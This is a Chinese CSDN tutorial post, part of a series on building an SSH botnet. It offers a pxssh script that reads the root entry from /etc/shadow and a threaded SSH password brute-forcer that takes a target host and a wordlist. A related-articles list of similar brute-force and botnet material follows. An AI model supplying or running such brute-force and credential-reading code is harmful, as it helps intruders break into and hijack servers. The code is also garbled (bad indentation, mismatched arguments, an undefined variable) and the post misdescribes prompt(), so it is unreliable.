【Python脚本进阶】2.2、构建一个SSH僵尸网络(中):用Pxssh暴力破解SSH密码

已于 2022-07-29 08:16:14 修改
阅读量491 收藏 3
点赞数 1
分类专栏: 【Py】Python脚本 文章标签: ssh python web安全
于 2022-07-28 20:18:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/126040184
版权

目录

一、Pxssh暴力破解SSH密码

1.1、函数:

1.2、使用Pxssh简化

1.3、函数:

1.4、自动化

一、Pxssh暴力破解SSH密码

1.1、函数:

prompt():是javascript语言中的一个方法,主要用处是显示提示对话框

pxssh模块用于在python中ssh远程连接,执行命令,返回结果,但注意不支持Windows系统

1.2、使用Pxssh简化

用Pxssh 进一步简化它,Pxssb 是一个包含了pexpect 库的专用脚本, 它能用预先写好的login()、logout()和prompt()等函数直接与SSH 进行交互。使用Pxssh可以将上个脚本简化成

import pxssh


def send_command(s, cmd):
    s.sendline(cmd)
    s.prompt()
    print(s.before)

def connect(host, user, password):
    try:
        s = pxssh.pxssh()
        s.login( host, user, password )
        return s
    except:
        print('[-] Error Connecting')
        exit( 0 )
s = connect ('127.0.0.1', 'root', 'toor')
send_command(s, 'cat /etc/shadow | grep root')

1.3、函数:

BoundedSemaphore(n):同一时刻最多允许n个线程访问特定资源

global:全局的

release:释放

add_option 添加设置选项

acquire方法是Python锁类,Python中线程模块的Lock类的内置方法

Thread是程序中的执行线程

1.4、自动化

再做些修改就能使脚本自动执行暴力破解SSH口令的任务。除增加了一些参数解析代码来读取主机名、用户名和存有待尝试的密码的文件外, 只需对connect()函数稍做修改。

如果login()函数执行成功, 并且没有抛出异常, 将打印一个消息, 表明密码已被找到并把表示密码已被找到的全局布尔值设为true。否则, 将捕获该异常。如果异常显示密码被拒绝, 知道这个密码不对, 让函数返回即可。但是,如果异常显示socket 为“ read_nonblocking", 可能是SSH服务器被大量的连接刷爆了, 可以稍等片刻后用相同的密码再试一次。此外, 如果该异常显示pxssh 命令提示符提取困难, 也应等待一会儿, 然后让它再试一次。

在connect()函数的参数里有一个布尔量release。由于connect()可以递归地调用另一个connect(), 必须让只有不是由connect()递归调用的connect()函数才能够释放connection_lock 信号。

import pxssh
import optparse
import time


from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print('[+] Password Found: ' + password)
    Found = True
    except Exception as e:
        if 'read_nonblocking' in str(e):
            Fails += 1
            time.sleep( 5 )
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            time.sleep( 1 )
            connect( host, user, password, False )
        finally:
        if release: connection_lock.release()

def main():
    parser = optparse.OptionParser( 'usage %prog ' + '-H <target host> -u <user> -F <password list>' )
    parser.add_option( '-H', dest= ' tgtHost', type='string', help=' specify target host')
    parser.add_option( '-F', dest= ' passwdFile', type='string', help='specify password file')
    parser.add_option( '-u', dest='user', type = 'string', help = 'specify the user')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwdFile
    user= options.user
    if host== None or passwdFile == None or user == None:
        print(parser.usage)
        exit(0)
    user = options.user
    fn = open( passwdFile,'r')
    user = options.user
    for line in fn.readlines():
    user = options.user
    if Found:
        print("[*] Exiting: Password Found")
        exit(0)
        if Fails > 5:
        print("[!] Exiting: Too Many Socket Timeouts")
        exit(0)
    connection_lock.acquire()
        password = line.strip('\r').strip('\n')
    print("[-] Testing: " + str(password))
        t = Thread(target=connect, args=(host, user, password, True))
        child = t.start()


if __name__ == '__main__':
    main()

黑色地带(崛起)
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BYOB(建立自己的僵尸网络)-Python开发
05-25
BYOB(建立自己的僵尸网络)有疑问吗? 加入我们的Discord服务器免责声明:此项目应仅用于授权测试或教育目的。 BYOB是一个开放源代码项目,它提供了一个框架,可用于构建自己的僵尸网络入门指南视频教程有疑问吗? 加入我们的Discord服务器免责声明:此项目应仅用于授权测试或教育目的。 BYOB是一个开源项目,它为安全研究人员和开发人员提供了一个框架,以构建和操作基本的僵尸网络,以加深他们对每年感染数百万设备并产生现代僵尸网络的复杂恶意软件的了解,从而提高他们的能力。发展c
用pxssh暴力破解SSH密码
qq_43776408的博客
11-07 269
运行以下程序之前你需要新建一个文件pass.txt 里面存密码 然后命令提示符输入 python 程序路径 -H 127.0.0.1 -u root -F pass.txt 程序大致意思是 先获取用户输入的三个参数并分别存到3个变量 读取文件第一行,并获得一个信号量,然后开启5个线程测试一个密码 测试密码的过程对于2个特殊异常做了特殊处理 然后释放信号量 重复上述步骤 全局布尔变量Foun...
Python 渗透测试:SSH 加密通道 传输文件 爆破.(22 端口)
最新发布
网络安全领域___专研者.
05-17 374
SSH(Secure Shell)是一种加密的网络协议,用于在不安全网络环境进行安全的远程连接和数据传输。SSH 爆破是一种常见的网络攻击手段,它试图通过暴力破解的方式获取远程 SSH 服务器的登录凭证。
手把手教你用Python进行SSH暴力破解
pdcfighting的博客
08-31 2071
点击上方“Python爬虫与数据挖掘”,进行关注回复“书籍”即可获赠Python从入门到进阶共10本电子书今日鸡汤青冥浩荡不见底,日月照耀金银台。暴力破解属于密码破解的一种,也是最常见的...
Python黑客攻防(十三)构建SSH僵尸网络
qq_43681532的博客
07-29 741
注:本篇文章仅供学习交流,请勿用于非法用途。转载须标明出处,参考:《Python绝技:运用Python成为顶级黑客》。 前言 攻击者在达成恶意目的时,通常会使用被黑掉的计算机群。我们称之为僵尸网络”,因为被黑掉的电脑会像僵尸一样执行指令。 为构建僵尸网络,我们必须引入一一个新的概念一类。 类的概念是面向编程对象和编程模型的基础。在这一编程模型,我们会把各个对象和它们所关联的方法一起实例化。 在我们的僵尸网络,每个单独的僵尸或client(客户端)都需要有能连上某台肉机,并把命令发送给肉机的能力。 # c
Python-黑客-004 用Python构建一个SSH僵尸网络-02 手动与SSH交互
weixin_30412013的博客
09-08 152
Python构建一个SSH僵尸网络-02 手动与SSH交互 — 登录SSH服务器端的 root 用户 我的电脑(攻击者)的系统:Ubuntu14.04 ; 用户名: aobosir@ubuntu:~$ 被攻击对象电脑(模拟的SSH服务端)的系统:Ubuntu16.04 ; 用户名:aobo@ubuntu:~$ 这一节,我们来手动的使用 SSH 连接目标电脑。 ...
Python脚本暴力破解栅栏密码
01-21
今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。 方法一(通用脚本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(‘请输入要解密的字符串\n‘) elen = len(e...
ssh工具 python脚本.zip
03-21
工具包一个 ssh工具.bat 脚本,该脚本可以用于启动 ssh工具.py 脚本,双击即可运行,在linux,也可以直接使用 python ssh工具.py 来启动 py 脚本脚本集成了链接ssh服务端、上传文档、上传文件夹、下载文档...
block-a-brute:阻止ssh暴力破解
05-12
这是一个命令行工具,用于阻止进行SSH暴力破解尝试的IP地址。 它使用auth.log查找SSH登录尝试,并通过抓取获取IP地理位置信息,并使用良好的iptables阻止IP地址。 通常,我需要查看Geoip信息来确定是否应阻止IP地址...
python批量修改ssh密码的实现
09-18
- 使用 Python 编写脚本,批量修改服务器上的 SSH 密码。 - 该脚本能够读取 Excel 表格的服务器信息(如 IP 地址、用户名等),并据此更新 SSH 密码。 #### 2. 技术选型与准备工作 - **Python 版本**:推荐使用 ...
python—用Pxssh暴力破解SSH密码
qq_28840013的博客
11-29 1224
用Pxssh暴力破解SSH密码 参考于《python绝技 运用python成为顶级黑客》 SSH相关介绍: SSH是主要用于为远程登陆会话提供安全保障的协议(即实现远程命令行操作) SSH可提供两种级别的安全验证: 1.基于口令的安全验证: 通过帐号和密码登录到远程主机 攻击方式:暴力破解 / “间人”攻击 2.基于密匙的安全验证: 需要依靠密匙,也就是你必须为自己创建一对密匙,并把公用...
暴力破解SSHPython源码
06-14
# sshBrute # ssh爆破工具 ## * 用途 基于字典文件破解ssh账号密码 ## * 依赖 pip install paramiko ## * 使用方法: Usage: sshBrute.py [options] host Options: -h, --help show this help message and exit -p PORT, --port=PORT port, default 22 -u USERNAME, --username=USERNAME username, default root(Linux) -f PWD_PATH, --file=PWD_PATH password dict file,default dict/password.txt ## * 其它 * sshBrute.py ,单线程实现 * sshBruteV2.py ,多线程实现
python 暴力破解SSH
weixin_33895695的博客
12-16 64
import pxsshimport optparseimport timefrom threading import *#最大线程数量控制数maxConnections=5connection_lock=BoundedSemaphore(value=maxConnections)#Found 为密码成功破解后退出程序的信号Found=False#Fails SSH连接数超...
Python脚本进阶2.2、组建一个SSH僵尸网络(终)
07-29 654
Python脚本进阶】组建僵尸网络
Python模块之pxssh
weixin_30352191的博客
01-04 1266
pxssh模块用于在pythonssh远程连接,执行命令,返回结果,但注意不支持Windows系统 #!/usr/bin/env python #-*- coding:utf-8 -*- from pexpect import pxssh host = "172.16.1.15" username = "root" password = "123456" cmd1 ...
用Pxssh实现与SSH的简单交互
zwlww1的博客
01-05 2137
#!/usr/bin/python #coding=utf-8 from optparse import OptionParser from pexpect import pxssh def send_command(child,cmd): child.sendline(cmd) #匹配prompt(提示符) child.prompt(
构建SSH僵尸网络
qq_43776408的博客
11-07 463
每个单独的僵尸或client都能连接上某台肉鸡 以下实现了三台主机登录一台肉鸡 这三台主机分别实例化三个不同的Client对象 并加到数组 然后通过函数botnetCommand读取用户输入的命令 并通过数组的Client对象调用send_command函数 三台主机并且每一台主机发送2条命令 所以最后又6条命令返回信息 #!/usr/bin/python # -*- coding: utf...
pxssh模块——python
weixin_34268843的博客
11-12 1479
1、描述: pxssh预先已经有了login()、logout()和prompt()等函数直接与ssh进行交互。 1.1 示例代码: #导入pxssh模块 import pxssh def send_command(s,cmd): #发送命令 s.sendline(cmd) #获取期望的输出提示符 s.prompt() #显示返回信...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值